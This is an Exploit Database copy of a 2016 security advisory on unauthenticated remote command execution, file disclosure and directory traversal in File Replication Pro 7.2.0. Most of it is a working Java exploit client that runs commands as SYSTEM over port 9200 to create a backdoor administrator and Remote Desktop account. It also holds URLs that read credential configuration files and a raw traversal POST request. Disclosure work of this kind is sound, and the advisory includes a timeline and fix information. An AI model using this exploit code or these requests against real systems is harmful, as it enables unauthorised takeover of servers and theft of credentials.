File Replication Pro 7.2.0 – Multiple Vulnerabilities

Exploit Database
139 阅读

作者： Vantage Point Security

日期： 2016-02-11
类别：
- remote
平台：
- jsp
来源：https://www.exploit-db.com/exploits/39439/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

Vantage Point Security Advisory 2016-001

================================

Title: File Replication Pro Remote Command Execution

Vendor: File Replication Pro

Vendor URL: http://www.filereplicationpro.com/

Versions affected: =< 7.2.0

Severity: High

Vendor notified: Yes

Reported: 29 October 2015

Public release: 10 February 2016

Author: Jerold Hoong and the VP team <jerold[at]vantagepoint[dot]sg>

Permalink:

Summary:

--------

File Replication Pro (FRP)is a file management solution that is used

to back up and copy files from various nodes in the network. Vantage

Point has discovered multiple vulnerabilities in FRP v7.2.0 (and

possibly prior versions) that allow a remote unauthenticated malicious

run arbitrary code with SYSTEM privileges.

The vulnerabilities that were discovered are:

- Unauthenticated Remote Command Execution

- Unauthenticated Remote Arbitrary File Disclosure

- Unauthenticated Directory Traversal and File Listing

1. Unauthenticated Remote Command Execution

-------------------------------------------

The backup agents implements a RPC service port 9200 that supports

various calls, including a function called "ExecCommand" that

unsurprisingly executes shell commands on the system. A password hash

is used to authenticate calls on this interface (note that the hash

itself and not the password is used for authentication). This hash can

be obtained from the remote file disclosure vulnerability present in

the software (listed below) and used toauthenticate to the RPC

service, where subsequently, arbitrary commands are executed as the

SYSTEM user.

POC Exploit Code of Malicious RPC Client:

/**

* @author Jerold Hoong (Vantage Point Security)

* File Replication Pro =< v7.2.0

* Remote Command Execution PoC Working Exploit

* www.vantagepoint.sg

* NOTE: Include FRP libraries to compile

import java.io.IOException;

import java.util.HashMap;

import java.util.Map;

import net.diasoft.frp.engine.exception.RPCException;

import net.diasoft.frp.engine.model.AddressPort;

import net.diasoft.frp.engine.tcp.client.RPCDriver;

import net.diasoft.frp.engine.tcp.client.TCPConnection;

public class Main {

static String ip = "1.2.3.4";

static int port = 9200;

// password string can be retrieved from remote file disclosure

vulnerability (configuration.xml)

// If no password is set, input blank string for password

// Use IE to navigate to <Target IP>:9200. OK = NO-AUTH, Error = AUTH

static String password = ""; // password 12345 jLIjfQZ5yojbZGTqxg2pY0VROWQ=

public static void main(String[] args) {

AddressPort ap = new AddressPort(ip, port);

AddressPort addresses[] = {ap};

TCPConnection _tcp_connection = null;

try {

_tcp_connection = new TCPConnection(addresses, password, true);

} catch (Exception e) {

e.printStackTrace();

}

System.out.print("Connecting to host...");

RPCDriver rpc = new RPCDriver(_tcp_connection);

HashMap p = new HashMap();

try {

Map r = rpc.callFunction("ExecCommand", p);

System.out.print("Success!\n");

} catch (RPCException e) {

e.printStackTrace();

} catch (IOException e) {

e.printStackTrace();

} catch (ClassNotFoundException e) {

e.printStackTrace();

}

// add new user

System.out.print("Attempting to add user 'vantagepoint' with

password 'LOLrofl1337!': ");

p.put("COMMAND", "net user vantagepoint LOLrofl1337! /add");

try {

Map r = rpc.callFunction("ExecCommand", p);

} catch (RPCException e) {

e.printStackTrace();

} catch (IOException e) {

e.printStackTrace();

} catch (ClassNotFoundException e) {

e.printStackTrace();

}

// add new user to Admin group

System.out.print("Attempting to add user 'vantagepoint' to

'Administrators' group: ");

p.put("COMMAND", "net localgroup \"Administrators\" vantagepoint /add");

try {

Map r = rpc.callFunction("ExecCommand", p);

} catch (RPCException e) {

e.printStackTrace();

} catch (IOException e) {

e.printStackTrace();

} catch (ClassNotFoundException e) {

e.printStackTrace();

}

//add new user to RDP group

System.out.print("Attempting to add user 'vantagepoint' to

'Remote Desktop Users' group:");

p.put("COMMAND", "net localgroup \"Remote Desktop Users\"

vantagepoint /add");

try {

Map r = rpc.callFunction("ExecCommand", p);

} catch (RPCException e) {

e.printStackTrace();

} catch (IOException e) {

e.printStackTrace();

} catch (ClassNotFoundException e) {

e.printStackTrace();

}

System.out.print("\n\n---- END ----\n\n");

}

2. Unauthenticated Remote Arbitrary File Disclosure

---------------------------------------------------

A flaw in File Replication Pro allows a malicious user to gain access

to the contents of any file on the remote server. This leads to the

compromise of sensitive information such as user accounts and password

hashes, which can then be used to further exploit the server using

other vulnerabilities in the software. An example of how to view File

Replication Pro's web interface user accounts and credentials is shown

below by accessing the following URLs:

- http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\properties.xml

- http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml

3. Unauthenticated Directory Traversal and File Listing

-------------------------------------------------------

It was possible to anonymously view the file directory structure of

the remote File Replication Pro management server as well as the file

directory structure of all server nodes that are managed by the

management server. The parameters that are used to construct the POST

request in the example code below can be obtained via the remote file

disclosure vulnerability by accessing File Replication Pro's

configuration.xml, properties.xml and .frp_id files.

POST /GetRemoteDirList.jsp?server_name=WIN7SP1&server_key=WIN7SP1~29d919a3:150c736b708:-8000&server_role=Source&server_password=&parent_dir=../../../c:/

HTTP/1.1

Host: 127.0.0.1:9100

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://127.0.0.1:9100/AddEditJob.do?action=new

Cookie: show_greeting=value; JSESSIONID=81cgjqf795cai

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache

Content-Length: 0

Fix Information:

----------------

Upgrade to the latest version of File Replication Pro 7.3.0

Timeline:

---------

28 October 2015- Vulnerabilities discovered

06 November 2015 - Vendor acknowledged and scheduled fixes to commence

02 February 2016 - Patch released by vendor

10 February 2016 - Release of this advisory to the public

About Vantage Point Security:

-----------------------------

Vantage Point is the leading provider for penetration testing and

security advisory services in Singapore. Clients in the Financial,

Banking and Telecommunications industries select Vantage Point

Security based on technical competency and a proven track record to

deliver significant and measurable improvements in their security

posture.

office[at]vantagepoint[dot]sg